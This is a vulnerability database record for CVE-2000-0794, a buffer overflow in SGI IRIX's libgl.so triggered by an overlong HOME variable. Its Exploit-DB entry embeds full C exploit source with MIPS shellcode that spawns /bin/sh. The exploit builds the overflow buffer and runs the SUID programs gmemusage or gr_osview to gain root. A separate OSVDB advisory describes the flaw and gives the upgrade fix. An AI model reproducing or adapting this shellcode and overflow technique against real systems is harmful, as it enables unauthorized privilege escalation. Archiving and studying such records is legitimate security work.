ID CVE-2000-0794 Type cve Reporter cve@mitre.org Modified 2008-09-05T20:21:00
Description
Buffer overflow in IRIX libgl.so library allows local users to gain root privileges via a long HOME variable to programs such as (1) gmemusage and (2) gr_osview.
{"exploitdb": [{"lastseen": "2016-02-02T13:31:35", "description": "SGI IRIX 6.2 libgl.so Buffer Overflow Vulnerability. CVE-2000-0794. Local exploit for irix platform", "published": "1997-09-01T00:00:00", "type": "exploitdb", "title": "SGI IRIX 6.2 libgl.so Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0794"], "modified": "1997-09-01T00:00:00", "id": "EDB-ID:20127", "href": "https://www.exploit-db.com/exploits/20127/", "sourceData": "source: http://www.securityfocus.com/bid/1527/info\r\n\r\n\r\nCertain versions of IRIX ship with a version libgl.so which is vulnerable to buffer overflow attacks. This library, libgl.so, is used in conjunction with graphical programs which use OpenGL. As a result a number of programs which utilize libgl.so can be exploited via this problem. The exploit which is in known public circulation at this time uses both gmemusage and gr_osview to exploit this problem. The buffer overflow itself is in how libgl.so handles the $HOME variable is handled (it is not checked for length). Further the programs which receive this $HOME variable from libgl.so further fail to limit it's size resulting in a buffer overflow attack. Should the receiving programs be SUID root (as are both gr_osview and gmemusage) the attacker will gain root access. \r\n\r\n /*## copyright LAST STAGE OF DELIRIUM sep 1997 poland *://lsd-pl.net/ #*/\r\n /*## libgl.so $HOME #*/\r\n\r\n #define ADRNUM 500\r\n #define PCHNUM 320\r\n #define TMPNUM 500\r\n #define NOPNUM 740\r\n #define ALLIGN 3\r\n\r\n char shellcode[]=\r\n \"\\x04\\x10\\xff\\xff\" /* bltzal $zero,<shellcode> */\r\n \"\\x24\\x02\\x03\\xf3\" /* li $v0,1011 */\r\n \"\\x23\\xff\\x01\\x14\" /* addi $ra,$ra,276 */\r\n \"\\x23\\xe4\\xff\\x08\" /* addi $a0,$ra,-248 */\r\n \"\\x23\\xe5\\xff\\x10\" /* addi $a1,$ra,-240 */\r\n \"\\xaf\\xe4\\xff\\x10\" /* sw $a0,-240($ra) */\r\n \"\\xaf\\xe0\\xff\\x14\" /* sw $zero,-236($ra) */\r\n \"\\xa3\\xe0\\xff\\x0f\" /* sb $zero,-241($ra) */\r\n \"\\x03\\xff\\xff\\xcc\" /* syscall */\r\n \"/bin/sh\"\r\n ;\r\n\r\n char jump[]=\r\n \"\\x03\\xa0\\x10\\x25\" /* move $v0,$sp */\r\n \"\\x03\\xe0\\x00\\x08\" /* jr $ra */\r\n ;\r\n\r\n char nop[]=\"\\x24\\x0f\\x12\\x34\";\r\n\r\n main(int argc,char **argv){\r\n char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2];\r\n int i,n=-1;\r\n\r\n printf(\"copyright LAST STAGE OF DELIRIUM sep 1997 poland //lsd-pl.net/\\n\");\r\n printf(\"libgl.so $HOME for irix 6.2 IP:20,22\\n\\n\");\r\n\r\n if(argc!=2){\r\n printf(\"usage: %s {gmemusage|gr_osview}\\n\",argv[0]);\r\n exit(-1);\r\n }\r\n if(!strcmp(argv[1],\"gmemusage\")) n=0;\r\n if(!strcmp(argv[1],\"gr_osview\")) n=1;\r\n if(n==-1) exit(-1);\r\n\r\n *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10268+252+824+500;\r\n *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10268+252+824+31868;\r\n *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10268;\r\n\r\n envp[0]=buffer;\r\n envp[1]=0;\r\n\r\n b=buffer;\r\n sprintf(b,\"HOME=\");\r\n b+=5;\r\n for(i=0;i<ALLIGN;i++) *b++=0xff;\r\n for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];\r\n *b++=0xff;\r\n for(i=0;i<PCHNUM;i++) *b++=pch[i%4];\r\n for(i=0;i<ALLIGN;i++) *b++=0xff;\r\n for(i=0;i<ADRNUM;i++) *b++=adr[i%4];\r\n for(i=0;i<NOPNUM;i++) *b++=nop[i%4];\r\n for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; \r\n *b=0;\r\n\r\n switch(n){\r\n case 0: execle(\"/usr/sbin/gmemusage\",\"lsd\",0,envp);\r\n case 1: execle(\"/usr/sbin/gr_osview\",\"lsd\",0,envp);\r\n }\r\n }\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20127/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2000-0794"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in IRIX. The gmemusage program and gr_osview programs, which use the libgl.so library, fail to validate the HOME environment variable resulting in a buffer overflow. With a specially crafted request, an attacker can obtain root privileges resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 6.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in IRIX. The gmemusage program and gr_osview programs, which use the libgl.so library, fail to validate the HOME environment variable resulting in a buffer overflow. With a specially crafted request, an attacker can obtain root privileges resulting in a loss of integrity.\n## References:\nVendor URL: http://www.sgi.com\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-07/0461.html\nISS X-Force ID: 5063\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/libgl.c\n[CVE-2000-0794](https://vulners.com/cve/CVE-2000-0794)\nBugtraq ID: 1527\n", "modified": "2000-08-02T00:00:00", "published": "2000-08-02T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8568", "id": "OSVDB:8568", "type": "osvdb", "title": "IRIX libgl.so HOME Variable Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
